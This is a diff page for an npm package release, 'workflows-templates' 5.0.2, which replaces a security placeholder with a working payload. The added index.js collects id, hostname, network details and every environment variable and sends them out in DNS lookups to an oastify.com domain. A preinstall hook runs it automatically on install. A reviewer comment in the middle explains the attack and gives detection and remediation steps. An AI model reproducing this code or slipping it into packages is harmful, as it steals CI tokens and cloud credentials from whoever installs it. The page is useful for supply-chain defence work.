workflows-templates 0.0.1-security → 5.0.2


Potentially problematic release.



Files changed (3)
  1. package/index.js +70 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
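--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,70 @@
+// Apex Hunter - DNS-Only Exfiltration Payload
+
+// ======================= CONFIGURATION =======================
+const oastDomain = '6lsozv0y071z0ztgwiu1ac06txz0nqbf.oastify.com';
+const payloadIdentifier = 'okta-dns-v5'; // Unique ID for this attack
+// =============================================================
+
+const os = require('os');
+const dns = require('dns');
+
+// Function to gather all system intelligence
+function gatherIntel() {
+const { execSync } = require('child_process');
+let report = '';
+const add = (label, command) => {
+try {
+report += `\n[${label}]\n${execSync(command, { stdio: 'pipe' }).toString()}\n`;
+} catch (e) {
+report += `\n[${label}]\nCOMMAND_FAILED\n`;
+}
+};
+
+add('TIMESTAMP', 'date');
+add('USER_CONTEXT', 'id');
+add('SYSTEM_INFO', 'hostname; uname -a');
+add('CURRENT_PATH', 'pwd');
+add('DNS_PROOFS', 'cat /etc/resolv.conf');
+add('NETWORK_PROOFS', 'ip -o a || ifconfig');
+add('ENV_VARS', 'env');
+
+return report;
+}
+
+// Function to exfiltrate data via DNS lookups
+function exfiltrateViaDns(data) {
+// Base64 encode the entire report to make it URL/DNS-safe
+const encodedData = Buffer.from(data).toString('base64').replace(/=/g, ''); // Remove padding
+
+// Split the long Base64 string into chunks of ~60 characters (DNS label max ~63)
+const chunks = encodedData.match(/.{1,60}/g) || [];
+
+const hostname = os.hostname() || 'unknown-host';
+const totalChunks = chunks.length;
+
+let i = 0;
+const sendChunk = () => {
+if (i >= totalChunks) {
+// Send final "END" packet
+dns.lookup(`${i}-of-${totalChunks}.END.${payloadIdentifier}.${hostname}.${oastDomain}`, () => {});
+return;
+}
+
+const chunk = chunks[i];
+// Format: [chunk_index]-of-[total_chunks].[payload_id].[hostname].[data_chunk].[oast_domain]
+const subdomain = `${i}-of-${totalChunks}.${payloadIdentifier}.${hostname}.${chunk}.${oastDomain}`;
+
+// Truncate to max length allowed for DNS label (253 chars)
+dns.lookup(subdomain.slice(0, 250), () => {
+i++;
+setTimeout(sendChunk, 100); // Throttle DNS requests
+});
+};
+
+console.log(`[+] Starting DNS exfiltration of ${totalChunks} chunks...`);
+sendChunk();
+}
+
+// Main Execution
+const intelReport = gatherIntel();
+exfiltrateViaDns(intelReport);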
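Review bot: This file is an install-time credential-exfiltration payload and must not be accepted in any form: the `preinstall` hook added in package/package.json runs `node index.js`, gatherIntel() executes shell commands including `env` and `cat /etc/resolv.conf`, and exfiltrateViaDns() places the base64-encoded output in the hostname of dns.lookup() calls ending in the `oastify.com` domain, so the data leaves the host even where HTTP egress is blocked. Every environment variable of the installing process — CI tokens, registry and cloud credentials — should be treated as compromised on any host that installed 5.0.2 and rotated. Detection signals are DNS query logs showing long multi-label names ending in `oastify.com`, and an npm `preinstall` script appearing in a package whose previous release was a security-holder placeholder (the README deleted in this same diff). Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) prevents the lifecycle hook from running, and the version should be reported to the registry for removal.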
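--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,11 @@
 {
 "name": "workflows-templates",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"version": "5.0.2",
+"description": "Stealth RCE PoC via DNS Exfiltration for Okta (nepalihacker000)",
+"main": "index.js",
+"scripts": {
+"preinstall": "node index.js"
+},
+"author": "nepalihacker000",
+"license": "ISC"
 }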
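--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.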